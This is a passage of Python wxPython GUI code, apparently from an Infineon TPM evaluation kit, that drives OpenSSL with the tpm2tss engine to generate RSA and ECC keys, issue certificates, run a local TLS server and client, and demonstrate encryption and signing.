"openssl",
"req", "-x509", "-sha256",
"-engine", "tpm2tss",
"-key", "rsa_CA.tss",
"-keyform", "engine",
"-in", "server_rsa.csr",
"-out", "CAsigned_rsa_cert.crt",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -x509 -sha256 -key rsa_CA.tss -engine tpm2tss -keyform engine -in server_rsa.csr -out CAsigned_rsa_cert.crt\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnStartServer(self, evt):
global server_proc,client_proc,server_log
global server_thread
global RSA_Server_thread_active_flag,RSA_Client_thread_active_flag
if (server_proc is not None):
RSA_Server_thread_active_flag=0
if (client_proc is not None):
RSA_Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % client_proc.pid)
kill_child_processes(client_proc.pid)
client_proc.terminate()
client_proc.wait()
client_proc = None
print("Server Thread Active..killing it: %d \n" % server_proc.pid)
kill_child_processes(server_proc.pid)
#server_proc.stdin.write("stop\n")
#server_thread.raise_exception()
#server_thread.join()
server_proc.terminate()
server_proc.wait()
server_proc = None
else:
#server_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
if (exec_cmd.ownerAuth !=""):
openssl_cmd="OPENSSL_CONF=temp.conf openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss"
else:
openssl_cmd="openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss"
server_proc = exec_cmd.createProcess(openssl_cmd, server_log)
server_thread = RSA_Server_Thread(1, server_proc)
server_thread.start()
wx.CallAfter(Publisher.sendMessage, "Server_Text", msg="\n\n" + openssl_cmd +"\n\n")
def OnStartClient(self, evt):
global client_proc,client_log,server_proc
global RSA_Client_thread_active_flag,RSA_Server_thread_active_flag
if (client_proc is not None):
RSA_Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % client_proc.pid)
kill_child_processes(client_proc.pid)
client_proc.terminate()
client_proc.wait()
client_proc = None
else:
#client_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
openssl_cmd="openssl s_client -connect localhost:4433 -tls1_2 -CAfile CA_rsa_cert.pem"
if (server_proc is not None):
client_proc = exec_cmd.createProcess(openssl_cmd, client_log)
client_thread = RSA_Client_Thread(2, client_proc)
client_thread.start()
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="\n\n" +openssl_cmd+"\n\n")
else:
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="Server is not active..\n")
def OnWriteServer(self, evt):
global server_proc
if (server_proc is None):
self.text_server.AppendText("Server is not running!\n")
return
write_value = self.input_server.GetValue()
if (write_value == ""):
self.text_server.AppendText("I need something to write!\n")
return
server_proc.stdin.write((write_value+"\n").encode())
server_proc.stdin.flush()
def OnWriteClient(self, evt):
global client_proc
if (client_proc is None):
self.text_client.AppendText("Client is not running!\n")
return
write_value = self.input_client.GetValue()
if (write_value == ""):
self.text_client.AppendText("I need something to write!\n")
return
client_proc.stdin.write((write_value+"\n").encode())
client_proc.stdin.flush()
class Tab_ECC_CS(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.HORIZONTAL)
steps_sizer = wx.BoxSizer(wx.VERTICAL)
server_sizer = wx.BoxSizer(wx.VERTICAL)
client_sizer = wx.BoxSizer(wx.VERTICAL)
# instantiate the objects
button_gen_ca = wx.Button(self, -1, 'Generate CA && CA Cert', size = (-1, 48))
button_gen_keypair = wx.Button(self, -1, 'Create Keypair (for server)', size = (-1, 48))
button_gen_csr = wx.Button(self, -1, 'Create CSR', size = (-1, 48))
button_gen_cert = wx.Button(self, -1, 'Create Server Cert', size = (-1, 48))
button_start_server = wx.Button(self, -1, 'Start/Stop Server')
button_start_client = wx.Button(self, -1, 'Start/Stop Client')
button_write_from_server = wx.Button(self, -1, 'Write to Client')
button_write_from_client = wx.Button(self, -1, 'Write to Server')
button_flush_client = wx.Button(self, -1, 'Clear client text', size = (-1, 48))
button_flush_server = wx.Button(self, -1, 'Clear server text', size = (-1, 48))
self.text_client = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_server = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_client.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.text_server.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.input_client = wx.TextCtrl(self, -1,value="Send from Client")
self.input_server = wx.TextCtrl(self, -1,value="Send from Server")
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the objects to the sizers
mainsizer.Add(steps_sizer, 0, wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(server_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(client_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
steps_sizer.Add(button_gen_ca, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_keypair, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_csr, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_cert, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_server, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_client, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.AddSpacer(236)
steps_sizer.Add(backbutton, 0, wx.ALL, 5)
server_sizer.Add(self.text_server, 1, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_start_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(self.input_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_write_from_server, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.text_client, 1, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_start_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.input_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_write_from_client, 0, wx.EXPAND | wx.ALL, 5)
# Set tooltips
button_gen_ca.SetToolTip(wx.ToolTip("Generate Key Pair and Self-Signed Certificate for the Certificate Authority (CA)."))
button_gen_keypair.SetToolTip(wx.ToolTip("Generate Key Pair for the Server."))
button_gen_csr.SetToolTip(wx.ToolTip("Generate Certificate Signing Request (CSR) for the CA, from the Server's private key."))
button_gen_cert.SetToolTip(wx.ToolTip("Generate Server Certificate from the CSR and the CA's private key."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnFlushClient, button_flush_client)
self.Bind(wx.EVT_BUTTON, self.OnFlushServer, button_flush_server)
self.Bind(wx.EVT_BUTTON, self.OnGenCA1, button_gen_ca)
self.Bind(wx.EVT_BUTTON, self.OnGenKeyPair1, button_gen_keypair)
self.Bind(wx.EVT_BUTTON, self.OnGenCSR1, button_gen_csr)
self.Bind(wx.EVT_BUTTON, self.OnGenCert, button_gen_cert)
self.Bind(wx.EVT_BUTTON, self.OnStartServer, button_start_server)
self.Bind(wx.EVT_BUTTON, self.OnStartClient, button_start_client)
self.Bind(wx.EVT_BUTTON, self.OnWriteServer, button_write_from_server)
self.Bind(wx.EVT_BUTTON, self.OnWriteClient, button_write_from_client)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
# Setup Publisher for text field update
Publisher.subscribe(self.Upd_Server_Status, "ECC_Server_Text")
Publisher.subscribe(self.Upd_Client_Status, "ECC_Client_Text")
self.SetSizer(mainsizer)
# declare threads related parameters
self.Server_thread_active_flag=0
self.Client_thread_active_flag=0
self.server_proc=None
self.client_proc=None
def server_thread(self):
try:
while self.Server_thread_active_flag==1 :
line = self.server_proc.stdout.readline()
                if line:  # skip empty reads (EOF); also correct if stdout yields bytes
wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg=line)
finally:
self.Server_thread_active_flag=0
print("Exit ECC server Thread\n")
wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg="Server Stopped..\n")
def client_thread(self):
while self.Client_thread_active_flag==1 :
line = self.client_proc.stdout.readline()
            if line:  # skip empty reads (EOF); also correct if stdout yields bytes
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg=line)
self.Client_thread_active_flag=0
print("Exit ECC client Thread\n")
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="Client Stopped..\n")
def Upd_Server_Status(self,msg):
self.text_server.AppendText(msg)
def Upd_Client_Status(self,msg):
self.text_client.AppendText(msg)
def OnBack(self, evt):
#~ if (self.server_proc is not None):
#~ self.Server_thread_active_flag=0
#~ if (self.client_proc is not None):
#~ self.Client_thread_active_flag=0
#~ print "Client Thread Active..killing it: %d \n" % self.client_proc.pid
#~ kill_child_processes(self.client_proc.pid)
#~ self.client_proc.terminate()
#~ self.client_proc.wait()
#~ self.client_proc = None
#~ print "Server Thread Active..killing it: %d \n" % self.server_proc.pid
#~ kill_child_processes(self.server_proc.pid)
#~ self.server_proc.terminate()
#~ self.server_proc.wait()
#~ self.server_proc = None
self.Parent.Parent.OnCloseWindow(None)
def Destroy(self):
if (self.server_proc is not None):
self.Server_thread_active_flag=0
if (self.client_proc is not None):
self.Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % self.client_proc.pid)
kill_child_processes(self.client_proc.pid)
self.client_proc.terminate()
self.client_proc.wait()
self.client_proc = None
print("Server Thread Active..killing it: %d \n" % self.server_proc.pid)
kill_child_processes(self.server_proc.pid)
self.server_proc.terminate()
self.server_proc.wait()
self.server_proc = None
def OnFlushClient(self, evt):
self.text_client.Clear()
def OnFlushServer(self, evt):
self.text_server.Clear()
def OnGenCA1(self, evt):
self.text_server.AppendText("Generating CA key-pair...\n")
wx.CallLater(10, self.OnGenCA)
def OnGenCA(self):
exec_cmd.execCLI(["rm", "ecc_CA.tss", ])
exec_cmd.execCLI(["rm", "CA_ecc_cert.pem", ])
exec_cmd.execCLI(["rm", "ecc_server.tss", ])
exec_cmd.execCLI(["rm", "server_ecc.csr", ])
exec_cmd.execCLI(["rm", "CAsigned_ecc_cert.crt", ])
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"-o",exec_cmd.ownerAuth,
"ecc_CA.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -a ecdsa -o %s ecc_CA.tss'\n" % exec_cmd.ownerAuth)
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-config","temp.conf",
"-engine", "tpm2tss",
"-key", "ecc_CA.tss",
"-keyform", "engine",
"-x509", "-sha256",
"-days", "7300",
#~ "-extensions", "v3_ca",
"-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA",
"-out", "CA_ecc_cert.pem",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -config temp.conf -key ecc_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_ecc_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"ecc_CA.tss",
])
self.text_server.AppendText("Generating CA key-pair: 'tpm2tss-genkey -a ecdsa ecc_CA.tss'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-engine", "tpm2tss",
"-key", "ecc_CA.tss",
"-keyform", "engine",
"-x509", "-sha256",
"-days", "7300",
#~ "-extensions", "v3_ca",
"-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA",
"-out", "CA_ecc_cert.pem",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -key ecc_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_ecc_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenKeyPair1(self, evt):
self.text_server.AppendText("Generating SERVER key-pair...\n")
wx.CallLater(10, self.OnGenKeyPair)
def OnGenKeyPair(self):
if (exec_cmd.ownerAuth !=""):
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"-o",exec_cmd.ownerAuth,
"ecc_server.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -a ecdsa -o %s ecc_server.tss'\n" % exec_cmd.ownerAuth)
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"ecc_server.tss",
])
self.text_server.AppendText("Generating SERVER key-pair: 'tpm2tss-genkey -a ecdsa ecc_server.tss'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCSR1(self, evt):
self.text_server.AppendText("Creating Certificate Signing Request...\n")
wx.CallLater(10, self.OnGenCSR)
def OnGenCSR(self):
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-config","temp.conf",
"-engine", "tpm2tss",
"-key", "ecc_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_ecc.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -config temp.conf -engine tpm2tss -key ecc_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_ecc.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-engine", "tpm2tss",
"-key", "ecc_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_ecc.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -engine tpm2tss -key ecc_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_ecc.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCert(self, evt):
self.text_server.AppendText("Creating Server Certificate...\n")
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
openssl_cmd="OPENSSL_CONF=temp.conf openssl x509 -req -in server_ecc.csr -CA CA_ecc_cert.pem -CAkey ecc_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_ecc_cert.crt -days 365 -sha256 -CAcreateserial"
server_proc = exec_cmd.createProcess(openssl_cmd, server_log)
#~ command_output = exec_cmd.execCLI([
#~ "openssl",
#~ "req", "-x509", "-sha256",
#~ "-config","temp.conf",
#~ "-engine", "tpm2tss",
#~ "-key", "ecc_CA.tss",
#~ "-keyform", "engine",
#~ "-in", "server_ecc.csr",
#~ "-out", "CAsigned_ecc_cert.crt",
#~ ])
#~ self.text_server.AppendText(str(command_output))
self.text_server.AppendText("OPENSSL_CONF=temp.conf openssl x509 -req -in server_ecc.csr -CA CA_ecc_cert.pem -CAkey ecc_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_ecc_cert.crt -days 365 -sha256 -CAcreateserial\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-x509", "-sha256",
"-engine", "tpm2tss",
"-key", "ecc_CA.tss",
"-keyform", "engine",
"-in", "server_ecc.csr",
"-out", "CAsigned_ecc_cert.crt",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -x509 -sha256 -key ecc_CA.tss -engine tpm2tss -keyform engine -in server_ecc.csr -out CAsigned_ecc_cert.crt\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnStartServer(self,evt):
if (self.server_proc is not None):
self.Server_thread_active_flag=0
if (self.client_proc is not None):
self.Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % self.client_proc.pid)
kill_child_processes(self.client_proc.pid)
self.client_proc.terminate()
self.client_proc.wait()
self.client_proc = None
print("Server Thread Active..killing it: %d \n" % self.server_proc.pid)
kill_child_processes(self.server_proc.pid)
self.server_proc.terminate()
self.server_proc.wait()
self.server_proc = None
else:
if (exec_cmd.ownerAuth !=""):
openssl_cmd="OPENSSL_CONF=temp.conf openssl s_server -cert CAsigned_ecc_cert.crt -accept 4432 -keyform engine -engine tpm2tss -key ecc_server.tss"
else:
openssl_cmd="openssl s_server -cert CAsigned_ecc_cert.crt -accept 4432 -keyform engine -engine tpm2tss -key ecc_server.tss"
self.server_proc = exec_cmd.createProcess(openssl_cmd, None)
self.Server_thread_active_flag=1
s_thread = threading.Thread(name='Server-daemon', target=self.server_thread)
            s_thread.daemon = True
s_thread.start()
wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg="\n\n" + openssl_cmd +"\n\n")
def OnStartClient(self, evt):
if (self.client_proc is not None):
self.Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % self.client_proc.pid)
kill_child_processes(self.client_proc.pid)
self.client_proc.terminate()
self.client_proc.wait()
self.client_proc = None
else:
#client_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
openssl_cmd="openssl s_client -connect localhost:4432 -tls1_2 -CAfile CA_ecc_cert.pem"
if (self.server_proc is not None):
self.client_proc = exec_cmd.createProcess(openssl_cmd, None)
self.Client_thread_active_flag=1
c_thread = threading.Thread(name='Client-daemon', target=self.client_thread)
                c_thread.daemon = True
c_thread.start()
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="\n\n" +openssl_cmd+"\n\n")
else:
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="Server is not active..\n")
def OnWriteServer(self, evt):
if (self.server_proc is None):
self.text_server.AppendText("Server is not running!\n")
return
write_value = self.input_server.GetValue()
if (write_value == ""):
self.text_server.AppendText("I need something to write!\n")
return
self.server_proc.stdin.write((write_value+"\n").encode())
self.server_proc.stdin.flush()
def OnWriteClient(self, evt):
if (self.client_proc is None):
self.text_client.AppendText("Client is not running!\n")
return
write_value = self.input_client.GetValue()
if (write_value == ""):
self.text_client.AppendText("I need something to write!\n")
return
self.client_proc.stdin.write((write_value+"\n").encode())
self.client_proc.stdin.flush()
class Tab_RSA_MISC(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.VERTICAL)
input_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# instantiate the objects
self.data_input = wx.TextCtrl(self, -1)
data_input_blurb = wx.StaticText(self, -1, "Data Input: ")
self.command_out = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY), size=(500, 500))
self.command_out.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_gen_rsakey = wx.Button(self, -1, 'Generate RSA Keypair', size = (-1, 47))
button_rsa_enc = wx.Button(self, -1, 'RSA Encrypt', size = (-1, 47))
button_rsa_dec = wx.Button(self, -1, 'RSA Decrypt', size = (-1, 47))
button_rsa_sign = wx.Button(self, -1, 'RSA Signing', size = (-1, 47))
button_rsa_verify = wx.Button(self, -1, 'RSA Verification', size = (-1, 47))
clearimage = wx.Image('../images/clear.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
clearbutton = wx.BitmapButton(self, -1, clearimage)
# ~clearbutton = wx.BitmapButton(self, -1, img.clear.getBitmap())
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the ui elements to the main sizer
mainsizer.AddSpacer(5)
mainsizer.Add(input_sizer, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
mainsizer.Add(button_sizer, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
mainsizer.Add(self.command_out, 1, wx.EXPAND | wx.TOP, 5)
input_sizer.Add(data_input_blurb, 0, wx.ALIGN_CENTER | wx.ALL, 5)
input_sizer.Add(self.data_input, 1, wx.ALL, 5)
button_sizer.Add(button_gen_rsakey, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_enc, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_dec, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_sign, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_verify, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(clearbutton, 0, wx.ALL, 5)
button_sizer.Add(backbutton, 0, wx.ALL, 5)
# Set tooltips
        button_gen_rsakey.SetToolTip(wx.ToolTip("Generate an RSA key pair."))
button_rsa_enc.SetToolTip(wx.ToolTip("Encrypt the data"))
button_rsa_dec.SetToolTip(wx.ToolTip("Decrypt the data"))
button_rsa_sign.SetToolTip(wx.ToolTip("Sign the data input with the private key"))
button_rsa_verify.SetToolTip(wx.ToolTip("Verify the signature with the public key"))
clearbutton.SetToolTip(wx.ToolTip("Clear all textboxes."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnClear, clearbutton)
self.Bind(wx.EVT_BUTTON, self.OnGenKey1, button_gen_rsakey)
self.Bind(wx.EVT_BUTTON, self.OnEnc1, button_rsa_enc)
self.Bind(wx.EVT_BUTTON, self.OnDec1, button_rsa_dec)
self.Bind(wx.EVT_BUTTON, self.OnSign1, button_rsa_sign)
self.Bind(wx.EVT_BUTTON, self.OnVerify, button_rsa_verify)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
self.data_input.write("Hello World")
self.SetSizer(mainsizer)
def OnGenKey1(self, evt):
self.command_out.write("Setting up TPM...\n")
wx.CallLater(10, self.OnGenKey)
def OnGenKey(self):
exec_cmd.execCLI(["rm", "rsa2.tss", ])
exec_cmd.execCLI(["rm", "mycipher", ])
exec_cmd.execCLI(["rm", "mysig", ])
if (exec_cmd.ownerAuth !=""):
command_output = exec_cmd.execCLI([
"tpm2tss-genkey",
"-o",exec_cmd.ownerAuth,
"-a", "rsa",
"rsa2.tss",
])
self.command_out.AppendText(str(command_output))
self.command_out.AppendText("'tpm2tss-genkey -a rsa rsa2.tss' executed \n")
command_output = exec_cmd.execCLI([
"openssl", "rsa",
"-engine", "tpm2tss",
"-inform", "engine",
"-in", "rsa2.tss",
"-pubout",
"-outform", "pem",
"-out", "rsa2.pub",
])
self.command_out.AppendText("'openssl rsa -engine tpm2tss -inform engine -in rsa2.tss -pubout -outform pem -out rsa2.pub' executed \n")
self.command_out.AppendText("rsa.tss contains: \n")
filehandle = open("rsa2.tss", 'r')
self.command_out.AppendText(filehandle.read() + "\n")
filehandle.close()
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"rsa2.tss",
])
self.command_out.AppendText(str(command_output))
self.command_out.AppendText("'tpm2tss-genkey -a rsa rsa2.tss' executed \n")
command_output = exec_cmd.execCLI([
"openssl", "rsa",
"-engine", "tpm2tss",
"-inform", "engine",
"-in", "rsa2.tss",
"-pubout",
"-outform", "pem",
"-out", "rsa2.pub",
])
self.command_out.AppendText("'openssl rsa -engine tpm2tss -inform engine -in rsa2.tss -pubout -outform pem -out rsa2.pub' executed \n")
self.command_out.AppendText("rsa.tss contains: \n")
filehandle = open("rsa2.tss", 'r')
self.command_out.AppendText(filehandle.read() + "\n")
filehandle.close()
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnEnc1(self, evt):
self.command_out.write("Encrypting Data...\n")
wx.CallLater(10, self.OnEnc)
def OnEnc(self):
if (self.data_input.GetValue()):
input_data = self.data_input.GetValue()
else:
self.command_out.AppendText("Input data cannot be blank")
return
data_file = open("engine_data.txt", "w")
data_file.write(input_data)
data_file.close()
exec_cmd.execCLI([
"openssl", "pkeyutl",
"-pubin",
"-inkey", "rsa2.pub",
"-in", "engine_data.txt",
"-encrypt",
"-out", "mycipher",
])
self.command_out.AppendText("'openssl pkeyutl -pubin -inkey rsa2.pub -in engine_data.txt -encrypt -out mycipher' executed \n")
self.command_out.AppendText("mycipher contains: \n")
command_output = exec_cmd.execCLI(["xxd", "mycipher", ])
self.command_out.AppendText(command_output + "\n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnDec1(self, evt):
self.command_out.write("Decrypting Data...\n")
wx.CallLater(10, self.OnDec)
def OnDec(self):
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
cmd ="OPENSSL_CONF=temp.conf openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.command_out.AppendText(str(command_output.decode()))
self.command_out.AppendText("\n' OPENSSL_CONF=temp.conf openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
cmd ="openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.command_out.AppendText(str(command_output.decode()))
self.command_out.AppendText("\n'openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnSign1(self, evt):
self.command_out.write("Signing Data Input with Private Key...\n")
wx.CallLater(10, self.OnSign)
def OnSign(self):
if (self.data_input.GetValue()):
input_data = self.data_input.GetValue()
else:
self.command_out.AppendText("Input data cannot be blank\n")
return
data_file = open("engine_data.txt", "w")
data_file.write(input_data)
data_file.close()
if (exec_cmd.ownerAuth !=""):
#~ exec_cmd.execCLI([
#~ "openssl", "pkeyutl",
#~ "-engine", "tpm2tss",
#~ "-keyform", "engine",
#~ "-inkey", "rsa2.tss",
#~ "-in", "engine_data.txt",
#~ "-sign",
#~ "-out", "mysig",
#~ ])
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
cmd ="OPENSSL_CONF=temp.conf openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -sign -in engine_data.txt -out mysig"
else:
cmd ="openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -sign -in engine_data.txt -out mysig"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.command_out.AppendText(cmd +" executed \n")
self.command_out.AppendText("mysig contains: \n")
command_output = exec_cmd.execCLI(["xxd", "mysig", ])
self.command_out.AppendText(command_output + "\n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnVerify(self, evt):
input_data = self.data_input.GetValue()
if(input_data==""):
self.command_out.AppendText("Input data cannot be blank\n")
return
data_file = open("engine_data.txt", "w")
data_file.write(input_data)
data_file.close()
command_output = exec_cmd.execCLI([
"openssl", "pkeyutl",
"-pubin",
"-inkey", "rsa2.pub",
"-verify",
"-in", "engine_data.txt",
"-sigfile", "mysig",
])
self.command_out.AppendText(str(command_output))
self.command_out.AppendText("'openssl pkeyutl -pubin -inkey rsa2.pub -verify -in engine_data.txt -sigfile mysig' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnClear(self, evt):
self.command_out.Clear()
    # The direct parent is the notebook and the notebook's parent is the
    # frame, so we reach up two levels to ask the frame to close.
def OnBack(self, evt):
self.Parent.Parent.OnCloseWindow(None)
class Tab_RNG(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.VERTICAL)
